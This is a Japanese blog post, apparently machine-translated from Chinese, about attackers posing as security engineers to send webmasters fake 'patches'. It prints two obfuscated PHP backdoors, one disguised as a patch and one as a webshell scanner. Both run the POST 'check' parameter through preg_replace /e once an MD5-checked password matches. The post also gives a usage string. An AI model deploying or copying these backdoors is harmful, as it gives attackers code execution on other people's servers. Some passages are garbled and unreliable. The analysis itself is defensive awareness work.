釣りを利用して人を騙す方法

0x00 前書き

2015年10月に書いた記事が今日偶然読まれたので、ブログに載せておきました。

長い間ブログが更新されていませんでした。

0x01 フィッシングモード

0x02 Magic Patch

これは、いわゆるセキュリティ エンジニアによってネットワーク管理者に送信されるセキュリティ コードです。

<?php$MMIC= $_GET['tid']?$_GET['tid']:$_GET['fid'];if($MMIC >1000000){  die('404');}if (isset($_POST["\x70\x61\x73\x73"]) && isset($_POST["\x63\x68\x65\x63\x6b"])){  $__PHP_debug   = array (    'ZendName' => '70,61,73,73',     'ZendPort' => '63,68,65,63,6b',    'ZendSalt' => '202cb962ac59075b964b07152d234b70'  //792e19812fafd57c7ac150af768d95ce  );   $__PHP_replace = array (    pack('H*', join('', explode(',', $__PHP_debug['ZendName']))),    pack('H*', join('', explode(',', $__PHP_debug['ZendPort']))),    $__PHP_debug['ZendSalt']  );  $__PHP_request = &$_POST;  $__PHP_token   = md5($__PHP_request[$__PHP_replace[0]]);   if ($__PHP_token == $__PHP_replace[2])  {    $__PHP_token = preg_replace (      chr(47).$__PHP_token.chr(47).chr(101),      $__PHP_request[$__PHP_replace[1]],      $__PHP_token    );     unset (      $__PHP_debug,      $__PHP_replace,      $__PHP_request,      $__PHP_token    );     if(!defined('_DEBUG_TOKEN')) exit ('Get token fail!');   }}

792e19812fafd57c7ac150af768d95ce の md5 を 123 202cb962ac59075b964b07152d234b70 の md5 に置き換えました

同様のコードに出会ったことがない場合は、このコードを見てください。前に、あなたはそれを持っているべきです。多くの人は「このコードは何をしているのですか、php カーネル?」と考えるでしょう。

一見したところ、バックドアはないはずです

Baidu で 792e19812fafd57c7ac150af768d95ce を検索し、スナップショットを見ると、次のことがわかります

最終的な復号は、実際には 1 つです。文 webshel​​l は preg_replace の /e を使用して実行されました。

利用方法: pass=123&check=phpinfo();

フィッシングコードには以下の種類もあります:

一部のハッカーはバックドアコードを仕掛けますトロイの木馬のバックドアをスキャンするプログラムにそれを入れます。特に卑劣な

<?php    # return 32md5 back 6    function getMd5($md5 = null) {        $key = substr(md5($md5),26);        return $key;         }         $array = array(            chr(112).chr(97).chr(115).chr(115), //pass            chr(99).chr(104).chr(101).chr(99).chr(107), // check            chr(99).chr(52).chr(53).chr(49).chr(99).chr(99) // c451cc        );        if ( isset($_POST) ){            $request = &$_POST;        }                 elseif ( isset($_REQUEST) )  $request = &$_REQUEST;                if ( isset($request[$array[0]]) && isset($request[$array[1]]) ) {             if ( getMd5($request[$array[0]]) == $array[2] ) {  //md5(pass) == c451cc                $token = preg_replace (                chr(47) . $array[2] . chr(47) . chr(101),  //  /c451cc/e                $request[$array[1]],                 $array[2]            );        }    }?>

0x03 特定のフィッシング

以下は、ハッカー フィッシングの実際の場面です。まず、ヘイ・クオの背景を見てみましょう。

1. セキュリティエンジニアのふりをする

個人ホームページ: http://loudong.360.cn/vul/profile/uid/2822960/

360 Butian のホワイト ハットのふりをして、自分の QQ アドレスを 360 会社の住所として書きました

しかし、ハッカーは Butian のホワイト ハットを 360 の従業員だと思いました

しかし、ウェブマスターは自分の 360 度のアイデンティティを信じていました。修正されたメモでは、360 セキュリティ チーム

1. がパッチ

のパッチ コードを使用し、* アドレスがすぐに 404 を受信したことを強調しているためです。また、chattr +i を使用してファイルを読み取り専用に設定します

0x04 概要

安全、まずは始めましょう